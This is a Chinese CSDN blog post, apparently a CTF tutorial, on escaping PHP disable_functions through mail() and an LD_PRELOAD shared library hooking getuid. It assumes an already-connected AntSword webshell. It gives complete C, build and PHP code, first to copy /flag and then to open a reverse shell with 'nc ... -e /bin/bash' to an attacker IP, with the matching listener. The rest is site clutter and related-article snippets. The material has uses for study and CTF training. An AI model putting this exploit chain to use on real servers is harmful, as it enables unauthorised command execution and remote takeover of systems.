mail函数绕过

已于 2024-07-24 16:45:30 修改
阅读量198 收藏 1
点赞数 3
分类专栏: web安全 文章标签: 安全 php web安全
于 2024-07-24 15:50:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lhy1963245411/article/details/140650024
版权

背景:所有命令执行函数都被禁了,mail函数可用,putenv文件可用,蚁剑连接成功,可以上传文件。

大致思路:控制脚本能够执行php文件,要求php文件中执行mail函数。能够对目标服务器传入.so文件。在.so文件中自定义getuid函数。最后将php文件和.so文件都传入目标机器。运行php文件

第一种方法:上传文件执行

第一步:蚁剑连接

要求连接成功,能够增删文件

第二步:编写php文件和.so文件

//demo.c
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void payload(){
    system("cat /flag > /tmp/flag");
}
int getuid()
{
    unsetenv("LD_PRELOAD");
    payload();
}
gcc -shared -fPIC demo.c -o demo.so
#demo.php
<?php
putenv("LD_PRELOAD=./demo.so");        #这里我把demo.php和demo.so放在同一个文件夹下。可以修改
mail("","","","");
?>

第三步:上传

然后将刚刚写好的demo.php和demo.so通过蚁剑上传上去

 然后在网页端访问刚刚上传的demo.php文件。

 

我们当时是将flag写入tmp底下的flag文件,所以我们来看看tmp底下是否多了flag文件,发现确实多出来了。

缺点: 

此方法不太灵活,一次只能执行一些事先确定的命令。

 第二种方法:反弹shell连接

大致思路:在php脚本中将写入flag的操作改为反弹shell连接。

因此php脚本改为:

//demo.c
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void payload(){
    system("nc xxx.xxx.xxx.xxx yyyy -e /bin/bash");
}     //xxx.xxx.xxx.xxx为攻击机的ip地址,yyyy为攻击机监听打开的端口
int getuid()
{
    unsetenv("LD_PRELOAD");
    payload();
}

 同时在攻击机上打开监听

nc -lvvp yyyy
yyyy为你想要开放的端口

feiwuw
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php mail函数漏洞,多个PHP mail函数引发的命令执行漏洞分析
weixin_29359001的博客
03-12 574
作者:qianyucun来源:绿盟科技博客近期,国外安全研究人@dawid_golunski曝光了多个使用PHP mail函数引发命令执行的漏洞。众多使用php内置mail函数的第三方邮件库,如phpmailer,SwiftMailer 纷纷中招。漏洞成因这些漏洞的成因和之前曝光的Roundcube命令执行漏洞如出一辙,都是由于其在调用php内置mail函数时,没有恰当过滤第5个参数,可以被注入恶...
php7禁用函数绕过,php中函数禁用绕过的原理与利用
weixin_32016633的博客
03-17 806
unsetenv("LD_PRELOAD");system("echo 'i hack it'");return 1;}然后使用gcc编译成一个动态链接库:gcc -shared -fPIC hack.c -o hack.so使用LD_PRELOAD加载并执行id命令,我们会得到如下的结果:再来更改一下uid测试,我们先adduser一个新用户hhhm,执行id命令结果如下:然后根据上面的步骤取得...
利用/绕过escapeshellarg/escapeshellcmd函数
LYJ20010728的博客
05-16 5387
利用/绕过escapeshellarg/escapeshellcmd[1]escapeshellarg和escapeshellcmd的功能[2]已知的绕过/利用参数注入TARFINDEscapeshellcmd和escapeshellarg用.bat执行命令SENDMAILCURLMYSQLUNZIP未设置LANG环境变量,则去除非ASCII字符[3]经典EXP[4]GitList RCE漏洞利用 [1]escapeshellarg和escapeshellcmd的功能 escapeshellarg: (P
disable_functions绕过总结
闵行小鱼塘
05-18 1881
总结下disable_functions绕过的一些方法
第二节 文件上传-绕过MIME-Type验证-01
09-15
"文件上传-MIME-Type验证绕过" MIME-Type是 Multipurpose Internet Mail Extensions 的缩写,中文名为多用途互联网邮件扩展类型。它是一种设定某种扩展名的文件用一种应用程序来打开的方式类型。当该扩展名文件被...
email-signin:WordPress插件。 使用用户名check-emailclick-link绕过典型的用户绕过登录
05-12
4. **电子邮件服务集成**:学习如何使用PHP的mail函数或第三方库(如PHPMailer)来发送验证邮件,并处理用户点击链接后的响应。 5. **URL重定向与会话管理**:在用户点击验证链接后,需要正确处理URL参数并验证用户...
易语言-易语言过百度云防护
06-29
在这个场景中,精易模块可能包含了网络通信相关的函数,比如HTTP请求、数据加密解密等,用于构建绕过防护的策略。 24mail,从名称上看,可能是一个电子邮件相关的服务或者库。在过百度云防护的上下文中,它可能被...
详解JavaScript表单验证(E-mail 验证)_.docx
10-10
在实际应用中,JavaScript验证通常作为第一道防线,但为了确保数据安全,开发者还应该在服务器端进行验证,因为JavaScript验证容易被禁用或绕过。此外,考虑到不同国家和地区对电子邮件地址的使用习惯,更严格的验证...
抓住PHP安全配置的两个重点
03-04
3. **safe_mode绕过**:在PHP-4.2.2之前的版本中,存在通过mail函数绕过safe_mode限制执行命令的漏洞。例如,在4.0.5版本中,只需在URL参数中添加分号和shell命令,即可执行恶意代码。对于4.0.6到4.2.2的版本,攻击...
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 655
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
cxyhjl的博客
07-21 714
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
内网安全:IPC横向
最新发布
8888的博客
07-23 526
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 548
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 682
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1162
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎云办公解决方案 3.0
CSDN云计算
07-18 1257
去确保性能体验流畅。与上一代产品相比,三擎云办公 3.0 新增 130+功能特性,不仅充分对标了主流云桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎云办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的云桌面办公系统环境。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 1250
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/中。2.6.2 将客户端所需的必要文件放到/root/client/中。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/中创建一个openvpn/
从人工巡检到智能防控:智慧油气田安全生产的新视角
TSINGSEE青犀视频官方技术博客
07-18 1109
远程视频监控:支持7/24小时实时高清视频监控,视频画面1、4、9、16个可选,支持自定义视频轮播。
clion多个mail函数
09-07
CLion 是一个集成开发环境(IDE),是用于开发和调试 C 和 C++ 程序的工具。在 CLion 中,你可以使用多个 mail 函数来发送电子邮件。 首先,CLion 支持使用 C 和 C++ 编写邮件发送代码。你可以使用标准的 C 和 C++ 库来处理字符串和网络连接。要发送电子邮件,你需要使用特定的邮件库,如 libcurl。你可以在 CLion 的项目中添加 libcurl 库,然后调用相应的函数来发送电子邮件。 在一个项目中使用多个 mail 函数可以实现不同的功能。例如,你可以编写一个 mail 函数来发送简单的文本邮件,另一个 mail 函数用于发送带有附件的邮件,还可以编写一个 mail 函数来发送 HTML 格式的邮件。通过使用不同的 mail 函数,你可以根据需求发送不同类型的邮件。 使用 CLion 来开发多个 mail 函数有多个好处。首先,CLion 提供了强大的代码编辑功能,包括语法高亮、自动补全和错误检查,可以帮助你编写正确的代码。其次,CLion 的调试工具可以帮助你检查并修复发送邮件时出现的问题。另外,CLion 的版本控制功能可以使你轻松管理你的代码,并与团队成员进行协作。 总之,CLion 是一个非常强大和灵活的开发工具,可以帮助你开发多个 mail 函数来发送不同类型的电子邮件。通过使用 CLion 的编辑、调试和版本控制功能,你可以更轻松地编写和管理你的代码,提高开发效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值